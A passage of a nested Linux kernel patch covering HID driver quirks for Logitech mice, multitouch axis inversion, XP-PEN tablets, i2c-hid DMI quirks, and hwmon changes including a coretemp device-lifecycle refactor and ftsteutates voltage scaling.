++		if (hidpp->quirks & HIDPP_QUIRK_HI_RES_SCROLL_1P0) {
+ 			hidpp->capabilities |= HIDPP_CAPABILITY_HIDPP10_FAST_SCROLL;
+ 			hid_dbg(hidpp->hid_dev, "Detected HID++ 1.0 fast scroll\n");
+ 		}
+@@ -4107,6 +4102,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
++	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4162,6 +4158,10 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			return ret;
+ 	}
+ 
++	if (hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT ||
++	    hidpp->quirks & HIDPP_QUIRK_UNIFYING)
++		will_restart = true;
++
+ 	INIT_WORK(&hidpp->work, delayed_work_cb);
+ 	mutex_init(&hidpp->send_mutex);
+ 	init_waitqueue_head(&hidpp->wait);
+@@ -4176,7 +4176,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	 * Plain USB connections need to actually call start and open
+ 	 * on the transport driver to allow incoming data.
+ 	 */
+-	ret = hid_hw_start(hdev, 0);
++	ret = hid_hw_start(hdev, will_restart ? 0 : connect_mask);
+ 	if (ret) {
+ 		hid_err(hdev, "hw start failed\n");
+ 		goto hid_hw_start_fail;
+@@ -4213,6 +4213,7 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 			hidpp->wireless_feature_index = 0;
+ 		else if (ret)
+ 			goto hid_hw_init_fail;
++		ret = 0;
+ 	}
+ 
+ 	if (connected && (hidpp->quirks & HIDPP_QUIRK_CLASS_WTP)) {
+@@ -4227,19 +4228,21 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	hidpp_connect_event(hidpp);
+ 
+-	/* Reset the HID node state */
+-	hid_device_io_stop(hdev);
+-	hid_hw_close(hdev);
+-	hid_hw_stop(hdev);
++	if (will_restart) {
++		/* Reset the HID node state */
++		hid_device_io_stop(hdev);
++		hid_hw_close(hdev);
++		hid_hw_stop(hdev);
+ 
+-	if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
+-		connect_mask &= ~HID_CONNECT_HIDINPUT;
++		if (hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT)
++			connect_mask &= ~HID_CONNECT_HIDINPUT;
+ 
+-	/* Now export the actual inputs and hidraw nodes to the world */
+-	ret = hid_hw_start(hdev, connect_mask);
+-	if (ret) {
+-		hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
+-		goto hid_hw_start_fail;
++		/* Now export the actual inputs and hidraw nodes to the world */
++		ret = hid_hw_start(hdev, connect_mask);
++		if (ret) {
++			hid_err(hdev, "%s:hid_hw_start returned error\n", __func__);
++			goto hid_hw_start_fail;
++		}
+ 	}
+ 
+ 	if (hidpp->quirks & HIDPP_QUIRK_CLASS_G920) {
+@@ -4297,9 +4300,15 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH,
+ 		USB_DEVICE_ID_LOGITECH_T651),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_WTP },
++	{ /* Mouse Logitech Anywhere MX */
++	  LDJ_DEVICE(0x1017), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Mouse logitech M560 */
+ 	  LDJ_DEVICE(0x402d),
+ 	  .driver_data = HIDPP_QUIRK_DELAYED_INIT | HIDPP_QUIRK_CLASS_M560 },
++	{ /* Mouse Logitech M705 (firmware RQM17) */
++	  LDJ_DEVICE(0x101b), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
++	{ /* Mouse Logitech Performance MX */
++	  LDJ_DEVICE(0x101a), .driver_data = HIDPP_QUIRK_HI_RES_SCROLL_1P0 },
+ 	{ /* Keyboard logitech K400 */
+ 	  LDJ_DEVICE(0x4024),
+ 	  .driver_data = HIDPP_QUIRK_CLASS_K400 },
+diff --git a/drivers/hid/hid-multitouch.c b/drivers/hid/hid-multitouch.c
+index 372cbdd223e09..e31be0cb8b850 100644
+--- a/drivers/hid/hid-multitouch.c
++++ b/drivers/hid/hid-multitouch.c
+@@ -71,6 +71,7 @@ MODULE_LICENSE("GPL");
+ #define MT_QUIRK_SEPARATE_APP_REPORT	BIT(19)
+ #define MT_QUIRK_FORCE_MULTI_INPUT	BIT(20)
+ #define MT_QUIRK_DISABLE_WAKEUP		BIT(21)
++#define MT_QUIRK_ORIENTATION_INVERT	BIT(22)
+ 
+ #define MT_INPUTMODE_TOUCHSCREEN	0x02
+ #define MT_INPUTMODE_TOUCHPAD		0x03
+@@ -1009,6 +1010,7 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			    struct mt_usages *slot)
+ {
+ 	struct input_mt *mt = input->mt;
++	struct hid_device *hdev = td->hdev;
+ 	__s32 quirks = app->quirks;
+ 	bool valid = true;
+ 	bool confidence_state = true;
+@@ -1086,6 +1088,10 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 		int orientation = wide;
+ 		int max_azimuth;
+ 		int azimuth;
++		int x;
++		int y;
++		int cx;
++		int cy;
+ 
+ 		if (slot->a != DEFAULT_ZERO) {
+ 			/*
+@@ -1104,6 +1110,9 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			if (azimuth > max_azimuth * 2)
+ 				azimuth -= max_azimuth * 4;
+ 			orientation = -azimuth;
++			if (quirks & MT_QUIRK_ORIENTATION_INVERT)
++				orientation = -orientation;
++
+ 		}
+ 
+ 		if (quirks & MT_QUIRK_TOUCH_SIZE_SCALING) {
+@@ -1115,10 +1124,23 @@ static int mt_process_slot(struct mt_device *td, struct input_dev *input,
+ 			minor = minor >> 1;
+ 		}
+ 
+-		input_event(input, EV_ABS, ABS_MT_POSITION_X, *slot->x);
+-		input_event(input, EV_ABS, ABS_MT_POSITION_Y, *slot->y);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_X, *slot->cx);
+-		input_event(input, EV_ABS, ABS_MT_TOOL_Y, *slot->cy);
++		x = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->x :
++			*slot->x;
++		y = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->y :
++			*slot->y;
++		cx = hdev->quirks & HID_QUIRK_X_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_X) - *slot->cx :
++			*slot->cx;
++		cy = hdev->quirks & HID_QUIRK_Y_INVERT ?
++			input_abs_get_max(input, ABS_MT_POSITION_Y) - *slot->cy :
++			*slot->cy;
++
++		input_event(input, EV_ABS, ABS_MT_POSITION_X, x);
++		input_event(input, EV_ABS, ABS_MT_POSITION_Y, y);
++		input_event(input, EV_ABS, ABS_MT_TOOL_X, cx);
++		input_event(input, EV_ABS, ABS_MT_TOOL_Y, cy);
+ 		input_event(input, EV_ABS, ABS_MT_DISTANCE, !*slot->tip_state);
+ 		input_event(input, EV_ABS, ABS_MT_ORIENTATION, orientation);
+ 		input_event(input, EV_ABS, ABS_MT_PRESSURE, *slot->p);
+@@ -1735,6 +1757,15 @@ static int mt_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (id->vendor == HID_ANY_ID && id->product == HID_ANY_ID)
+ 		td->serial_maybe = true;
+ 
++
++	/* Orientation is inverted if the X or Y axes are
++	 * flipped, but normalized if both are inverted.
++	 */
++	if (hdev->quirks & (HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT) &&
++	    !((hdev->quirks & HID_QUIRK_X_INVERT)
++	      && (hdev->quirks & HID_QUIRK_Y_INVERT)))
++		td->mtclass.quirks = MT_QUIRK_ORIENTATION_INVERT;
++
+ 	/* This allows the driver to correctly support devices
+ 	 * that emit events over several HID messages.
+ 	 */
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 5bc91f68b3747..66e64350f1386 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -1237,7 +1237,7 @@ EXPORT_SYMBOL_GPL(hid_quirks_exit);
+ static unsigned long hid_gets_squirk(const struct hid_device *hdev)
+ {
+ 	const struct hid_device_id *bl_entry;
+-	unsigned long quirks = 0;
++	unsigned long quirks = hdev->initial_quirks;
+ 
+ 	if (hid_match_id(hdev, hid_ignore_list))
+ 		quirks |= HID_QUIRK_IGNORE;
+diff --git a/drivers/hid/hid-uclogic-core.c b/drivers/hid/hid-uclogic-core.c
+index cfbbc39807a69..bfbb51f8b5beb 100644
+--- a/drivers/hid/hid-uclogic-core.c
++++ b/drivers/hid/hid-uclogic-core.c
+@@ -22,25 +22,6 @@
+ 
+ #include "hid-ids.h"
+ 
+-/* Driver data */
+-struct uclogic_drvdata {
+-	/* Interface parameters */
+-	struct uclogic_params params;
+-	/* Pointer to the replacement report descriptor. NULL if none. */
+-	__u8 *desc_ptr;
+-	/*
+-	 * Size of the replacement report descriptor.
+-	 * Only valid if desc_ptr is not NULL
+-	 */
+-	unsigned int desc_size;
+-	/* Pen input device */
+-	struct input_dev *pen_input;
+-	/* In-range timer */
+-	struct timer_list inrange_timer;
+-	/* Last rotary encoder state, or U8_MAX for none */
+-	u8 re_state;
+-};
+-
+ /**
+  * uclogic_inrange_timeout - handle pen in-range state timeout.
+  * Emulate input events normally generated when pen goes out of range for
+@@ -202,6 +183,7 @@ static int uclogic_probe(struct hid_device *hdev,
+ 	}
+ 	timer_setup(&drvdata->inrange_timer, uclogic_inrange_timeout, 0);
+ 	drvdata->re_state = U8_MAX;
++	drvdata->quirks = id->driver_data;
+ 	hid_set_drvdata(hdev, drvdata);
+ 
+ 	/* Initialize the device and retrieve interface parameters */
+@@ -529,8 +511,14 @@ static const struct hid_device_id uclogic_devices[] = {
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2) },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S) },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
++				USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW),
++		.driver_data = UCLOGIC_MOUSE_FRAME_QUIRK | UCLOGIC_BATTERY_QUIRK },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_UGEE,
+ 				USB_DEVICE_ID_UGEE_XPPEN_TABLET_STAR06) },
+ 	{ }
+diff --git a/drivers/hid/hid-uclogic-params.c b/drivers/hid/hid-uclogic-params.c
+index 3c5eea3df3288..0cc03c11ecc22 100644
+--- a/drivers/hid/hid-uclogic-params.c
++++ b/drivers/hid/hid-uclogic-params.c
+@@ -1222,6 +1222,11 @@ static int uclogic_params_ugee_v2_init_frame_mouse(struct uclogic_params *p)
+  */
+ static bool uclogic_params_ugee_v2_has_battery(struct hid_device *hdev)
+ {
++	struct uclogic_drvdata *drvdata = hid_get_drvdata(hdev);
++
++	if (drvdata->quirks & UCLOGIC_BATTERY_QUIRK)
++		return true;
++
+ 	/* The XP-PEN Deco LW vendor, product and version are identical to the
+ 	 * Deco L. The only difference reported by their firmware is the product
+ 	 * name. Add a quirk to support battery reporting on the wireless
+@@ -1298,6 +1303,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 				       struct hid_device *hdev)
+ {
+ 	int rc = 0;
++	struct uclogic_drvdata *drvdata;
+ 	struct usb_interface *iface;
+ 	__u8 bInterfaceNumber;
+ 	const int str_desc_len = 12;
+@@ -1316,6 +1322,7 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 		goto cleanup;
+ 	}
+ 
++	drvdata = hid_get_drvdata(hdev);
+ 	iface = to_usb_interface(hdev->dev.parent);
+ 	bInterfaceNumber = iface->cur_altsetting->desc.bInterfaceNumber;
+ 
+@@ -1382,6 +1389,9 @@ static int uclogic_params_ugee_v2_init(struct uclogic_params *params,
+ 	p.pen.subreport_list[0].id = UCLOGIC_RDESC_V1_FRAME_ID;
+ 
+ 	/* Initialize the frame interface */
++	if (drvdata->quirks & UCLOGIC_MOUSE_FRAME_QUIRK)
++		frame_type = UCLOGIC_PARAMS_FRAME_MOUSE;
++
+ 	switch (frame_type) {
+ 	case UCLOGIC_PARAMS_FRAME_DIAL:
+ 	case UCLOGIC_PARAMS_FRAME_MOUSE:
+@@ -1659,8 +1669,12 @@ int uclogic_params_init(struct uclogic_params *params,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO01_V2):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_L):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_MW):
+ 	case VID_PID(USB_VENDOR_ID_UGEE,
+ 		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_S):
++	case VID_PID(USB_VENDOR_ID_UGEE,
++		     USB_DEVICE_ID_UGEE_XPPEN_TABLET_DECO_PRO_SW):
+ 		rc = uclogic_params_ugee_v2_init(&p, hdev);
+ 		if (rc != 0)
+ 			goto cleanup;
+diff --git a/drivers/hid/hid-uclogic-params.h b/drivers/hid/hid-uclogic-params.h
+index a97477c02ff82..b0e7f3807939b 100644
+--- a/drivers/hid/hid-uclogic-params.h
++++ b/drivers/hid/hid-uclogic-params.h
+@@ -19,6 +19,9 @@
+ #include <linux/usb.h>
+ #include <linux/hid.h>
+ 
++#define UCLOGIC_MOUSE_FRAME_QUIRK	BIT(0)
++#define UCLOGIC_BATTERY_QUIRK		BIT(1)
++
+ /* Types of pen in-range reporting */
+ enum uclogic_params_pen_inrange {
+ 	/* Normal reports: zero - out of proximity, one - in proximity */
+@@ -215,6 +218,27 @@ struct uclogic_params {
+ 	struct uclogic_params_frame frame_list[3];
+ };
+ 
++/* Driver data */
++struct uclogic_drvdata {
++	/* Interface parameters */
++	struct uclogic_params params;
++	/* Pointer to the replacement report descriptor. NULL if none. */
++	__u8 *desc_ptr;
++	/*
++	 * Size of the replacement report descriptor.
++	 * Only valid if desc_ptr is not NULL
++	 */
++	unsigned int desc_size;
++	/* Pen input device */
++	struct input_dev *pen_input;
++	/* In-range timer */
++	struct timer_list inrange_timer;
++	/* Last rotary encoder state, or U8_MAX for none */
++	u8 re_state;
++	/* Device quirks */
++	unsigned long quirks;
++};
++
+ /* Initialize a tablet interface and discover its parameters */
+ extern int uclogic_params_init(struct uclogic_params *params,
+ 				struct hid_device *hdev);
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index b86b62f971080..72f2c379812c7 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -1035,6 +1035,10 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 	hid->vendor = le16_to_cpu(ihid->hdesc.wVendorID);
+ 	hid->product = le16_to_cpu(ihid->hdesc.wProductID);
+ 
++	hid->initial_quirks = quirks;
++	hid->initial_quirks |= i2c_hid_get_dmi_quirks(hid->vendor,
++						      hid->product);
++
+ 	snprintf(hid->name, sizeof(hid->name), "%s %04X:%04X",
+ 		 client->name, (u16)hid->vendor, (u16)hid->product);
+ 	strscpy(hid->phys, dev_name(&client->dev), sizeof(hid->phys));
+@@ -1048,8 +1052,6 @@ int i2c_hid_core_probe(struct i2c_client *client, struct i2chid_ops *ops,
+ 		goto err_mem_free;
+ 	}
+ 
+-	hid->quirks |= quirks;
+-
+ 	return 0;
+ 
+ err_mem_free:
+diff --git a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+index 8e0f67455c098..210f17c3a0be0 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
++++ b/drivers/hid/i2c-hid/i2c-hid-dmi-quirks.c
+@@ -10,8 +10,10 @@
+ #include <linux/types.h>
+ #include <linux/dmi.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/hid.h>
+ 
+ #include "i2c-hid.h"
++#include "../hid-ids.h"
+ 
+ 
+ struct i2c_hid_desc_override {
+@@ -416,6 +418,28 @@ static const struct dmi_system_id i2c_hid_dmi_desc_override_table[] = {
+ 	{ }	/* Terminate list */
+ };
+ 
++static const struct hid_device_id i2c_hid_elan_flipped_quirks = {
++	HID_DEVICE(BUS_I2C, HID_GROUP_MULTITOUCH_WIN_8, USB_VENDOR_ID_ELAN, 0x2dcd),
++		HID_QUIRK_X_INVERT | HID_QUIRK_Y_INVERT
++};
++
++/*
++ * This list contains devices which have specific issues based on the system
++ * they're on and not just the device itself. The driver_data will have a
++ * specific hid device to match against.
++ */
++static const struct dmi_system_id i2c_hid_dmi_quirk_table[] = {
++	{
++		.ident = "DynaBook K50/FR",
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++			DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&i2c_hid_elan_flipped_quirks,
++	},
++	{ }	/* Terminate list */
++};
++
+ 
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+ {
+@@ -450,3 +474,21 @@ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 	*size = override->hid_report_desc_size;
+ 	return override->hid_report_desc;
+ }
++
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{
++	u32 quirks = 0;
++	const struct dmi_system_id *system_id =
++			dmi_first_match(i2c_hid_dmi_quirk_table);
++
++	if (system_id) {
++		const struct hid_device_id *device_id =
++				(struct hid_device_id *)(system_id->driver_data);
++
++		if (device_id && device_id->vendor == vendor &&
++		    device_id->product == product)
++			quirks = device_id->driver_data;
++	}
++
++	return quirks;
++}
+diff --git a/drivers/hid/i2c-hid/i2c-hid.h b/drivers/hid/i2c-hid/i2c-hid.h
+index 96c75510ad3f1..2c7b66d5caa0f 100644
+--- a/drivers/hid/i2c-hid/i2c-hid.h
++++ b/drivers/hid/i2c-hid/i2c-hid.h
+@@ -9,6 +9,7 @@
+ struct i2c_hid_desc *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name);
+ char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 					       unsigned int *size);
++u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product);
+ #else
+ static inline struct i2c_hid_desc
+ 		   *i2c_hid_get_dmi_i2c_hid_desc_override(uint8_t *i2c_name)
+@@ -16,6 +17,8 @@ static inline struct i2c_hid_desc
+ static inline char *i2c_hid_get_dmi_hid_report_desc_override(uint8_t *i2c_name,
+ 							     unsigned int *size)
+ { return NULL; }
++static inline u32 i2c_hid_get_dmi_quirks(const u16 vendor, const u16 product)
++{ return 0; }
+ #endif
+ 
+ /**
+diff --git a/drivers/hwmon/Kconfig b/drivers/hwmon/Kconfig
+index 3176c33af6c69..300ce8115ce4f 100644
+--- a/drivers/hwmon/Kconfig
++++ b/drivers/hwmon/Kconfig
+@@ -1516,7 +1516,7 @@ config SENSORS_NCT6775_CORE
+ config SENSORS_NCT6775
+ 	tristate "Platform driver for Nuvoton NCT6775F and compatibles"
+ 	depends on !PPC
+-	depends on ACPI_WMI || ACPI_WMI=n
++	depends on ACPI || ACPI=n
+ 	select HWMON_VID
+ 	select SENSORS_NCT6775_CORE
+ 	help
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index a901e4e33d81d..b4d65916b3c00 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -299,6 +299,7 @@ static const struct ec_board_info board_info_pro_art_x570_creator_wifi = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB | SENSOR_TEMP_VRM |
+ 		SENSOR_TEMP_T_SENSOR | SENSOR_FAN_CPU_OPT |
+ 		SENSOR_CURR_CPU | SENSOR_IN_CPU_CORE,
++	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+ 	.family = family_amd_500_series,
+ };
+ 
+diff --git a/drivers/hwmon/coretemp.c b/drivers/hwmon/coretemp.c
+index ca7a9b373bbd6..3e440ebe2508c 100644
+--- a/drivers/hwmon/coretemp.c
++++ b/drivers/hwmon/coretemp.c
+@@ -588,66 +588,49 @@ static void coretemp_remove_core(struct platform_data *pdata, int indx)
+ 		ida_free(&pdata->ida, indx - BASE_SYSFS_ATTR_NO);
+ }
+ 
+-static int coretemp_probe(struct platform_device *pdev)
++static int coretemp_device_add(int zoneid)
+ {
+-	struct device *dev = &pdev->dev;
++	struct platform_device *pdev;
+ 	struct platform_data *pdata;
++	int err;
+ 
+ 	/* Initialize the per-zone data structures */
+-	pdata = devm_kzalloc(dev, sizeof(struct platform_data), GFP_KERNEL);
++	pdata = kzalloc(sizeof(*pdata), GFP_KERNEL);
+ 	if (!pdata)
+ 		return -ENOMEM;
+ 
+-	pdata->pkg_id = pdev->id;
++	pdata->pkg_id = zoneid;
+ 	ida_init(&pdata->ida);
+-	platform_set_drvdata(pdev, pdata);
+ 
+-	pdata->hwmon_dev = devm_hwmon_device_register_with_groups(dev, DRVNAME,
+-								  pdata, NULL);
+-	return PTR_ERR_OR_ZERO(pdata->hwmon_dev);
+-}
+-
+-static int coretemp_remove(struct platform_device *pdev)
+-{
+-	struct platform_data *pdata = platform_get_drvdata(pdev);
+-	int i;
++	pdev = platform_device_alloc(DRVNAME, zoneid);
++	if (!pdev) {
++		err = -ENOMEM;
++		goto err_free_pdata;
++	}
+ 
+-	for (i = MAX_CORE_DATA - 1; i >= 0; --i)
+-		if (pdata->core_data[i])
+-			coretemp_remove_core(pdata, i);
++	err = platform_device_add(pdev);
++	if (err)
++		goto err_put_dev;
+ 
+-	ida_destroy(&pdata->ida);
++	platform_set_drvdata(pdev, pdata);
++	zone_devices[zoneid] = pdev;
+ 	return 0;
+-}
+ 
+-static struct platform_driver coretemp_driver = {
+-	.driver = {
+-		.name = DRVNAME,
+-	},
+-	.probe = coretemp_probe,
+-	.remove = coretemp_remove,
+-};
++err_put_dev:
++	platform_device_put(pdev);
++err_free_pdata:
++	kfree(pdata);
++	return err;
++}
+ 
+-static struct platform_device *coretemp_device_add(unsigned int cpu)
++static void coretemp_device_remove(int zoneid)
+ {
+-	int err, zoneid = topology_logical_die_id(cpu);
+-	struct platform_device *pdev;
+-
+-	if (zoneid < 0)
+-		return ERR_PTR(-ENOMEM);
+-
+-	pdev = platform_device_alloc(DRVNAME, zoneid);
+-	if (!pdev)
+-		return ERR_PTR(-ENOMEM);
+-
+-	err = platform_device_add(pdev);
+-	if (err) {
+-		platform_device_put(pdev);
+-		return ERR_PTR(err);
+-	}
++	struct platform_device *pdev = zone_devices[zoneid];
++	struct platform_data *pdata = platform_get_drvdata(pdev);
+ 
+-	zone_devices[zoneid] = pdev;
+-	return pdev;
++	ida_destroy(&pdata->ida);
++	kfree(pdata);
++	platform_device_unregister(pdev);
+ }
+ 
+ static int coretemp_cpu_online(unsigned int cpu)
+@@ -671,7 +654,10 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 	if (!cpu_has(c, X86_FEATURE_DTHERM))
+ 		return -ENODEV;
+ 
+-	if (!pdev) {
++	pdata = platform_get_drvdata(pdev);
++	if (!pdata->hwmon_dev) {
++		struct device *hwmon;
++
+ 		/* Check the microcode version of the CPU */
+ 		if (chk_ucode_version(cpu))
+ 			return -EINVAL;
+@@ -682,9 +668,11 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 		 * online. So, initialize per-pkg data structures and
+ 		 * then bring this core online.
+ 		 */
+-		pdev = coretemp_device_add(cpu);
+-		if (IS_ERR(pdev))
+-			return PTR_ERR(pdev);
++		hwmon = hwmon_device_register_with_groups(&pdev->dev, DRVNAME,
++							  pdata, NULL);
++		if (IS_ERR(hwmon))
++			return PTR_ERR(hwmon);
++		pdata->hwmon_dev = hwmon;
+ 
+ 		/*
+ 		 * Check whether pkgtemp support is available.
+@@ -694,7 +682,6 @@ static int coretemp_cpu_online(unsigned int cpu)
+ 			coretemp_add_core(pdev, cpu, 1);
+ 	}
+ 
+-	pdata = platform_get_drvdata(pdev);
+ 	/*
+ 	 * Check whether a thread sibling is already online. If not add the
+ 	 * interface for this CPU core.
+@@ -713,18 +700,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	struct temp_data *tdata;
+ 	int i, indx = -1, target;
+ 
+-	/*
+-	 * Don't execute this on suspend as the device remove locks
+-	 * up the machine.
+-	 */
++	/* No need to tear down any interfaces for suspend */
+ 	if (cpuhp_tasks_frozen)
+ 		return 0;
+ 
+ 	/* If the physical CPU device does not exist, just return */
+-	if (!pdev)
+-		return 0;
+-
+ 	pd = platform_get_drvdata(pdev);
++	if (!pd->hwmon_dev)
++		return 0;
+ 
+ 	for (i = 0; i < NUM_REAL_CORES; i++) {
+ 		if (pd->cpu_map[i] == topology_core_id(cpu)) {
+@@ -756,13 +739,14 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	}
+ 
+ 	/*
+-	 * If all cores in this pkg are offline, remove the device. This
+-	 * will invoke the platform driver remove function, which cleans up
+-	 * the rest.
++	 * If all cores in this pkg are offline, remove the interface.
+ 	 */
++	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (cpumask_empty(&pd->cpumask)) {
+-		zone_devices[topology_logical_die_id(cpu)] = NULL;
+-		platform_device_unregister(pdev);
++		if (tdata)
++			coretemp_remove_core(pd, PKG_SYSFS_ATTR_NO);
++		hwmon_device_unregister(pd->hwmon_dev);
++		pd->hwmon_dev = NULL;
+ 		return 0;
+ 	}
+ 
+@@ -770,7 +754,6 @@ static int coretemp_cpu_offline(unsigned int cpu)
+ 	 * Check whether this core is the target for the package
+ 	 * interface. We need to assign it to some other cpu.
+ 	 */
+-	tdata = pd->core_data[PKG_SYSFS_ATTR_NO];
+ 	if (tdata && tdata->cpu == cpu) {
+ 		target = cpumask_first(&pd->cpumask);
+ 		mutex_lock(&tdata->update_lock);
+@@ -789,7 +772,7 @@ static enum cpuhp_state coretemp_hp_online;
+ 
+ static int __init coretemp_init(void)
+ {
+-	int err;
++	int i, err;
+ 
+ 	/*
+ 	 * CPUID.06H.EAX[0] indicates whether the CPU has thermal
+@@ -805,20 +788,22 @@ static int __init coretemp_init(void)
+ 	if (!zone_devices)
+ 		return -ENOMEM;
+ 
+-	err = platform_driver_register(&coretemp_driver);
+-	if (err)
+-		goto outzone;
++	for (i = 0; i < max_zones; i++) {
++		err = coretemp_device_add(i);
++		if (err)
++			goto outzone;
++	}
+ 
+ 	err = cpuhp_setup_state(CPUHP_AP_ONLINE_DYN, "hwmon/coretemp:online",
+ 				coretemp_cpu_online, coretemp_cpu_offline);
+ 	if (err < 0)
+-		goto outdrv;
++		goto outzone;
+ 	coretemp_hp_online = err;
+ 	return 0;
+ 
+-outdrv:
+-	platform_driver_unregister(&coretemp_driver);
+ outzone:
++	while (i--)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ 	return err;
+ }
+@@ -826,8 +811,11 @@ module_init(coretemp_init)
+ 
+ static void __exit coretemp_exit(void)
+ {
++	int i;
++
+ 	cpuhp_remove_state(coretemp_hp_online);
+-	platform_driver_unregister(&coretemp_driver);
++	for (i = 0; i < max_zones; i++)
++		coretemp_device_remove(i);
+ 	kfree(zone_devices);
+ }
+ module_exit(coretemp_exit)
+diff --git a/drivers/hwmon/ftsteutates.c b/drivers/hwmon/ftsteutates.c
+index f5b8e724a8ca1..ffa0bb3648775 100644
+--- a/drivers/hwmon/ftsteutates.c
++++ b/drivers/hwmon/ftsteutates.c
+@@ -12,6 +12,7 @@
+ #include <linux/i2c.h>
+ #include <linux/init.h>
+ #include <linux/jiffies.h>
++#include <linux/math.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
+@@ -347,13 +348,15 @@ static ssize_t in_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
+-	return sprintf(buf, "%u\n", data->volt[index]);
++	value = DIV_ROUND_CLOSEST(data->volt[index] * 3300, 255);
++
++	return sprintf(buf, "%d\n", value);
+ }
+ 
+ static ssize_t temp_value_show(struct device *dev,
+@@ -361,13 +364,15 @@ static ssize_t temp_value_show(struct device *dev,
+ {
+ 	struct fts_data *data = dev_get_drvdata(dev);
+ 	int index = to_sensor_dev_attr(devattr)->index;
+-	int err;
++	int value, err;
+ 
+ 	err = fts_update_device(data);
+ 	if (err < 0)
+ 		return err;
+ 
